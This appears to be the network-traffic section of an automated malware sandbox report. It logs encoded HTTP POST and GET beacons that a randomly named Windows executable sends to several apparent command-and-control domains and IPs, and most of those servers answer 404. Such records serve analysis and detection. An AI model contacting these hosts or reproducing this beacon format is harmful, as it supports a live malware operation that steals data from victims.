                                                                Dec 11, 2024 15:04:31.135067940 CET | 765 bytes | OUT | POST /l9wb/ HTTP/1.1
                                                                Host: www.44ynh.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 241
                                                                Origin: http://www.44ynh.top
                                                                Referer: http://www.44ynh.top/l9wb/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 51 49 41 31 41 74 57 46 51 33 42 67 34 2f 2f 69 57 5a 71 56 4c 7a 56 6b 52 59 35 48 64 70 5a 78 6b 75 35 31 55 6d 53 69 46 55 77 78 46 54 32 63 51 4e 70 31 33 52 77 59 62 70 6a 76 6c 70 61 64 4a 4d 6b 69 63 75 78 66 64 66 77 71 45 4b 78 54 79 36 45 43 31 62 32 2f 6b 74 70 35 72 59 2b 48 36 4a 4e 61 34 77 6e 39 57 5a 53 73 62 46 31 51 4a 2b 73 33 59 55 71 70 4d 35 56 58 2f 74 4c 4a 72 53 48 56 59 56 31 2f 30 38 70 31 4e 6f 76 6b 64 6b 35 56 30 47 76 37 66 73 32 42 55 4f 46 54 73 6f 34 71 58 6a 45 71 4d 43 6c 2f 74 71 72 6c 50 4a 6a 51 31 47 4c 48 4c 4e 4e 37 32 47 69 52 33 38 31 37 6f 64 4f 55 74 52 55 4b 6c 6c 4d 50 77 70 30 74 59 6c 6e 63 7a 66 32 6d 79 31 47 6c 48 4d 75 55 46 51 55 3d
                                                                Data Ascii: 9rKHjDxP=QIA1AtWFQ3Bg4//iWZqVLzVkRY5HdpZxku51UmSiFUwxFT2cQNp13RwYbpjvlpadJMkicuxfdfwqEKxTy6EC1b2/ktp5rY+H6JNa4wn9WZSsbF1QJ+s3YUqpM5VX/tLJrSHVYV1/08p1Novkdk5V0Gv7fs2BUOFTso4qXjEqMCl/tqrlPJjQ1GLHLNN72GiR3817odOUtRUKllMPwp0tYlnczf2my1GlHMuUFQU=
                                                                Dec 11, 2024 15:04:32.666948080 CET | 302 bytes | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 11 Dec 2024 14:04:32 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 138
                                                                Connection: close
                                                                ETag: "66df0ead-8a"
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                11 | 192.168.2.7 | 49972 | 38.181.21.178 | 80 | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 11, 2024 15:04:33.792908907 CET | 1778 | OUT | POST /l9wb/ HTTP/1.1
                                                                Host: www.44ynh.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 1253
                                                                Origin: http://www.44ynh.top
                                                                Referer: http://www.44ynh.top/l9wb/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 51 49 41 31 41 74 57 46 51 33 42 67 34 2f 2f 69 57 5a 71 56 4c 7a 56 6b 52 59 35 48 64 70 5a 78 6b 75 35 31 55 6d 53 69 46 55 6f 78 46 68 4f 63 53 75 78 31 32 52 77 59 54 4a 6a 75 6c 70 61 4d 4a 4d 4d 75 63 75 74 50 64 64 49 71 57 5a 35 54 30 49 73 43 2b 62 32 2f 6d 74 70 30 6d 34 2b 57 36 4a 64 57 34 77 33 39 57 5a 53 73 62 45 6c 51 64 62 4d 33 65 55 71 75 61 70 56 54 37 74 4b 75 72 54 76 6a 59 56 78 76 30 73 4a 31 4f 49 2f 6b 52 33 52 56 37 47 76 35 4d 63 32 6a 55 4f 42 63 73 6f 6b 78 58 67 59 4d 4d 46 4a 2f 76 65 6d 75 64 62 72 4c 70 6e 33 4d 4b 2b 45 65 30 6e 4f 67 32 61 4a 6d 6d 4e 53 54 73 69 55 72 75 57 77 44 38 4d 6b 72 4e 6b 72 55 71 2b 71 59 79 41 54 2b 61 74 4f 30 48 6e 4b 49 4c 79 2b 57 39 2f 54 75 39 65 73 6c 51 42 6e 6f 68 34 71 63 68 4f 41 7a 2b 59 65 6e 55 54 65 47 79 38 4e 67 4c 49 59 32 6e 53 32 4b 2b 73 44 66 70 42 47 6d 72 4e 4b 4d 63 6f 2f 55 2b 6c 59 69 58 48 36 66 32 51 47 56 46 7a 66 5a 2b 65 4b 51 73 6c 67 6c 73 55 4d 58 34 66 32 69 70 57 2f 6f 6b [TRUNCATED]
                                                                Data Ascii: 9rKHjDxP=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 [TRUNCATED]
                                                                Dec 11, 2024 15:04:35.320136070 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 11 Dec 2024 14:04:35 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 138
                                                                Connection: close
                                                                ETag: "66df0ead-8a"
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                12 | 192.168.2.7 | 49978 | 38.181.21.178 | 80 | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 11, 2024 15:04:36.445671082 CET | 491 | OUT | GET /l9wb/?9rKHjDxP=dKoVDaTSZmwFjIfkW8eCOVVdW49NdaF1rLRKWxbZMRgsIAaeZOJ62iUdSY3DsOWKNrgOWvNnZKtmZJtN7rtvxumUtdp8gpSZ+pYO0AiTerbcUhpiZvFAaWm7Nt0Fw8mr3zjcUwdfloZd&rLx0p=06jDTp00Q HTTP/1.1
                                                                Host: www.44ynh.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Dec 11, 2024 15:04:37.967968941 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 11 Dec 2024 14:04:37 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 138
                                                                Connection: close
                                                                ETag: "66df0ead-8a"
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                13 | 192.168.2.7 | 49984 | 23.167.152.41 | 80 | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 11, 2024 15:04:53.003578901 CET | 748 | OUT | POST /q34f/ HTTP/1.1
                                                                Host: www.75178.club
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 221
                                                                Origin: http://www.75178.club
                                                                Referer: http://www.75178.club/q34f/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 51 57 45 56 77 47 79 2f 6c 79 59 78 71 55 75 59 6d 50 51 52 54 6a 57 62 62 45 73 59 2f 56 61 55 6d 62 72 71 78 32 49 43 47 67 30 47 56 49 4e 45 50 75 32 4e 64 5a 66 46 7a 4d 77 6f 68 46 32 6d 6a 65 2b 79 4b 4a 72 78 33 68 68 45 70 50 6a 36 5a 4b 67 39 70 55 34 6f 54 6f 64 44 30 6c 47 63 4a 73 4a 32 36 65 59 41 44 39 4e 74 58 31 6f 6e 47 48 32 62 41 2f 38 59 5a 55 6e 45 49 59 47 74 73 45 48 47 41 45 6c 47 6b 64 69 74 76 66 4b 30 52 46 42 56 64 30 70 4b 45 55 48 7a 31 34 50 76 61 4a 30 63 37 68 39 6d 67 30 5a 43 67 4a 43 76 34 4b 58 51 42 46 69 6d 71 41 55 69 73 4c 34 53 2b 45 71 37 52 42 6b 6f 63 4d 65 36 47 73 65 58 74 77 3d 3d
                                                                Data Ascii: 9rKHjDxP=QWEVwGy/lyYxqUuYmPQRTjWbbEsY/VaUmbrqx2ICGg0GVINEPu2NdZfFzMwohF2mje+yKJrx3hhEpPj6ZKg9pU4oTodD0lGcJsJ26eYAD9NtX1onGH2bA/8YZUnEIYGtsEHGAElGkditvfK0RFBVd0pKEUHz14PvaJ0c7h9mg0ZCgJCv4KXQBFimqAUisL4S+Eq7RBkocMe6GseXtw==


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                14 | 192.168.2.7 | 49985 | 23.167.152.41 | 80 | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 11, 2024 15:04:55.666630983 CET | 768 | OUT | POST /q34f/ HTTP/1.1
                                                                Host: www.75178.club
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 241
                                                                Origin: http://www.75178.club
                                                                Referer: http://www.75178.club/q34f/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 51 57 45 56 77 47 79 2f 6c 79 59 78 72 33 6d 59 67 73 34 52 61 6a 57 59 48 55 73 59 71 6c 61 51 6d 62 6e 71 78 33 64 66 42 55 59 47 56 73 4a 45 49 73 65 4e 51 35 66 46 34 73 77 68 38 56 32 54 6a 65 79 4d 4b 49 58 78 33 68 31 45 70 4f 54 36 5a 37 67 38 6f 45 34 71 47 34 64 42 72 31 47 63 4a 73 4a 32 36 59 31 6c 44 39 46 74 57 46 34 6e 4a 46 4f 45 4d 66 38 58 59 55 6e 45 44 34 47 70 73 45 48 42 41 46 4a 34 6b 66 61 74 76 66 61 30 52 52 56 61 58 30 6f 50 4f 30 47 54 32 4b 36 4c 57 37 6f 63 32 41 78 7a 75 45 6c 79 6c 2f 44 4e 69 6f 62 38 66 55 61 64 75 43 77 55 37 74 6c 6e 38 46 75 6a 63 6a 51 4a 44 37 37 51 4c 2b 2f 54 37 49 41 4b 34 45 6e 63 6d 2f 43 6a 52 4a 6b 70 6e 50 5a 37 51 7a 67 3d
                                                                Data Ascii: 9rKHjDxP=QWEVwGy/lyYxr3mYgs4RajWYHUsYqlaQmbnqx3dfBUYGVsJEIseNQ5fF4swh8V2TjeyMKIXx3h1EpOT6Z7g8oE4qG4dBr1GcJsJ26Y1lD9FtWF4nJFOEMf8XYUnED4GpsEHBAFJ4kfatvfa0RRVaX0oPO0GT2K6LW7oc2AxzuElyl/DNiob8fUaduCwU7tln8FujcjQJD77QL+/T7IAK4Encm/CjRJkpnPZ7Qzg=


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                15 | 192.168.2.7 | 49986 | 23.167.152.41 | 80 | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 11, 2024 15:04:58.322983027 CET | 1781 | OUT | POST /q34f/ HTTP/1.1
                                                                Host: www.75178.club
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 1253
                                                                Origin: http://www.75178.club
                                                                Referer: http://www.75178.club/q34f/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 51 57 45 56 77 47 79 2f 6c 79 59 78 72 33 6d 59 67 73 34 52 61 6a 57 59 48 55 73 59 71 6c 61 51 6d 62 6e 71 78 33 64 66 42 56 4d 47 56 2f 52 45 4f 4e 65 4e 52 35 66 46 78 4d 77 6b 38 56 32 4b 6a 65 37 4c 4b 49 61 4d 33 69 4e 45 70 73 62 36 49 2f 30 38 68 45 34 71 45 34 64 41 30 6c 47 7a 4a 73 5a 79 36 59 46 6c 44 39 46 74 57 41 30 6e 4f 58 32 45 4f 66 38 59 5a 55 6e 49 49 59 47 4e 73 45 76 4f 41 46 39 6f 6b 76 36 74 71 4c 47 30 54 6b 42 61 62 30 6f 42 4a 30 47 78 32 4b 6d 55 57 36 46 6e 32 41 46 5a 75 44 42 79 6e 36 6a 56 33 37 4c 2f 4d 6b 4b 4c 77 6a 64 30 7a 74 78 54 79 6d 2b 70 63 44 63 32 42 4c 48 57 4c 50 75 65 36 4d 68 7a 70 48 7a 76 6d 64 6d 50 62 4f 4a 36 7a 50 78 36 4e 57 76 49 68 36 59 63 33 4f 2b 6f 59 65 6a 53 39 38 78 31 53 4f 63 72 54 49 4d 73 4a 38 44 4b 6c 32 35 69 45 53 65 57 31 49 46 4c 41 63 62 4e 4e 65 61 7a 75 78 59 4e 45 42 32 6f 4a 74 69 30 45 44 4d 33 59 71 39 39 57 35 6a 41 56 79 49 53 41 79 74 79 77 77 62 30 53 65 70 56 2b 42 6d 33 4f 70 6b 75 6c [TRUNCATED]
                                                                Data Ascii: 9rKHjDxP=QWEVwGy/lyYxr3mYgs4RajWYHUsYqlaQmbnqx3dfBVMGV/REONeNR5fFxMwk8V2Kje7LKIaM3iNEpsb6I/08hE4qE4dA0lGzJsZy6YFlD9FtWA0nOX2EOf8YZUnIIYGNsEvOAF9okv6tqLG0TkBab0oBJ0Gx2KmUW6Fn2AFZuDByn6jV37L/MkKLwjd0ztxTym+pcDc2BLHWLPue6MhzpHzvmdmPbOJ6zPx6NWvIh6Yc3O+oYejS98x1SOcrTIMsJ8DKl25iESeW1IFLAcbNNeazuxYNEB2oJti0EDM3Yq99W5jAVyISAytywwb0SepV+Bm3OpkulB5QOPB+3gJnS7EC5T7XUQhLxDvriG1zaNSHQFvsjGWf53xXr4THaljPpp+CaVPSLIW6ln6SSeP9THxfzTyQmZLzUHoJXvTdnx07UOlTULRdoO2W5l1brKfYxP+YuUJAL3hDPioUSYPHbJOGEdzt+yp2j+5vH6VSwmPywlUhoNRh0znsCcoK0Ez+esk9cNBZyOfSLzcvyHSXBKp5tgor4GZNtLCGiOAt/VCC623K8VyyYqMn6dbiWlYM0wLpfaf9VThj+L8lTUrqkQgSpD3fkzuFpl7pyOtnDpSIvKq85moqBMj5XNlKOj/tI+jLpb4hVg525VS36tHWnmPDmoJA6icQx1mcmKoKFZk0umIAOIVpcsTZUGL1mSmZ7MhIn5MkApfY1tWZIvup5JH+bXapHq5vujkifdNcHWOogz3w1fKv2bFQbqfL61dNzvIjN+pqrKhdg1NlhO4s1a5LQOYQ3o1aGbLTuUMAXBQEGPvpIGD+Xy2iQ+RA45EgYF9qjFPuRLdo5V06gjfyWNhhK9ZNU+6pyQ23xbXvX/EopSd7iD/LMfb+VRbIBG6cdexoHZYfBoKYCsTCc5KeluLtfZpfPVAGc0vxeiogtC5AyBxaLGQQTAApBNwCfCf6IImSSio3MPRVZBb2uPk4zL+O+W+G3LQfCCPQfuZIbl/ [TRUNCATED]


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                16 | 192.168.2.7 | 49987 | 23.167.152.41 | 80 | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 11, 2024 15:05:00.974229097 CET | 492 | OUT | GET /q34f/?9rKHjDxP=dUs1zx3MtgRbplDUvpUvYjuAQD0vmGuhj9/PkAdaJlwoIMpaDvWmQ8f5x9wKpmWIn5GTBIDw1kY0kdraeZ9erFxSPIl4knKdLfgwmO1oEe1lTFw6B1+2EJs+fQO6G9vPzlr5NjlOo8Ha&rLx0p=06jDTp00Q HTTP/1.1
                                                                Host: www.75178.club
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                17 | 192.168.2.7 | 49988 | 103.75.185.22 | 80 | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 11, 2024 15:05:08.760087013 CET | 775 | OUT | POST /syud/ HTTP/1.1
                                                                Host: www.taxitayninh365.site
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 221
                                                                Origin: http://www.taxitayninh365.site
                                                                Referer: http://www.taxitayninh365.site/syud/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 74 79 4d 49 37 75 67 41 76 4c 70 4d 48 4e 51 36 59 78 4f 30 6e 46 67 36 6a 38 79 2b 63 69 6f 73 35 61 71 54 4f 2f 6c 5a 46 57 43 52 34 78 6a 30 55 77 35 51 73 4d 4a 4d 76 45 34 35 70 44 31 58 59 79 7a 79 30 64 5a 73 52 43 4f 76 5a 57 6a 61 4f 6b 46 32 4a 58 66 71 76 41 47 32 48 77 4b 75 6b 69 52 47 50 56 6b 4a 59 5a 41 58 66 51 52 4a 66 46 70 31 38 4b 45 7a 44 48 6e 46 52 42 54 63 5a 42 48 6b 65 56 32 2b 71 39 70 79 51 6b 45 47 37 35 67 52 78 61 72 38 64 79 6e 39 7a 77 61 4a 56 55 34 69 59 4f 4c 59 63 41 6c 30 64 73 79 2f 6e 42 78 61 6d 41 6f 6f 71 35 53 45 55 68 75 48 74 32 46 46 34 61 2f 77 59 71 39 46 35 51 6e 52 78 77 3d 3d
                                                                Data Ascii: 9rKHjDxP=tyMI7ugAvLpMHNQ6YxO0nFg6j8y+cios5aqTO/lZFWCR4xj0Uw5QsMJMvE45pD1XYyzy0dZsRCOvZWjaOkF2JXfqvAG2HwKukiRGPVkJYZAXfQRJfFp18KEzDHnFRBTcZBHkeV2+q9pyQkEG75gRxar8dyn9zwaJVU4iYOLYcAl0dsy/nBxamAooq5SEUhuHt2FF4a/wYq9F5QnRxw==
                                                                Dec 11, 2024 15:05:10.314253092 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 1238
                                                                date: Wed, 11 Dec 2024 14:05:10 GMT
                                                                server: LiteSpeed
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                                Dec 11, 2024 15:05:10.314271927 CET | 240 | IN | Data Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                                Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                18 | 192.168.2.7 | 49989 | 103.75.185.22 | 80 | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 11, 2024 15:05:11.419085979 CET | 795 | OUT | POST /syud/ HTTP/1.1
                                                                Host: www.taxitayninh365.site
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 241
                                                                Origin: http://www.taxitayninh365.site
                                                                Referer: http://www.taxitayninh365.site/syud/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 74 79 4d 49 37 75 67 41 76 4c 70 4d 64 73 67 36 65 53 57 30 68 6c 67 39 39 4d 79 2b 56 43 6f 33 35 61 75 54 4f 37 39 4a 47 6b 57 52 37 51 54 30 54 78 35 51 72 4d 4a 4d 33 55 34 38 6e 6a 30 5a 59 79 75 59 30 63 31 73 52 47 6d 76 5a 55 72 61 4f 33 74 33 4b 6e 66 73 36 51 47 4f 61 67 4b 75 6b 69 52 47 50 57 59 6a 59 64 73 58 66 43 46 4a 51 45 70 32 30 71 45 77 4b 6e 6e 46 56 42 54 59 5a 42 48 53 65 51 57 59 71 2f 68 79 51 68 67 47 37 73 41 65 34 61 72 32 51 53 6d 50 2b 56 6e 73 62 30 30 2b 57 4f 2f 78 45 48 6c 6a 56 36 7a 64 39 6a 39 32 34 52 51 54 75 37 32 79 44 48 7a 79 76 33 42 64 31 34 4c 52 48 64 59 76 30 43 47 56 6e 4a 2f 32 47 73 4c 72 4f 4c 62 6b 63 64 50 51 75 66 63 34 35 68 51 3d
                                                                Data Ascii: 9rKHjDxP=tyMI7ugAvLpMdsg6eSW0hlg99My+VCo35auTO79JGkWR7QT0Tx5QrMJM3U48nj0ZYyuY0c1sRGmvZUraO3t3Knfs6QGOagKukiRGPWYjYdsXfCFJQEp20qEwKnnFVBTYZBHSeQWYq/hyQhgG7sAe4ar2QSmP+Vnsb00+WO/xEHljV6zd9j924RQTu72yDHzyv3Bd14LRHdYv0CGVnJ/2GsLrOLbkcdPQufc45hQ=
                                                                Dec 11, 2024 15:05:12.978686094 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 1238
                                                                date: Wed, 11 Dec 2024 14:05:12 GMT
                                                                server: LiteSpeed
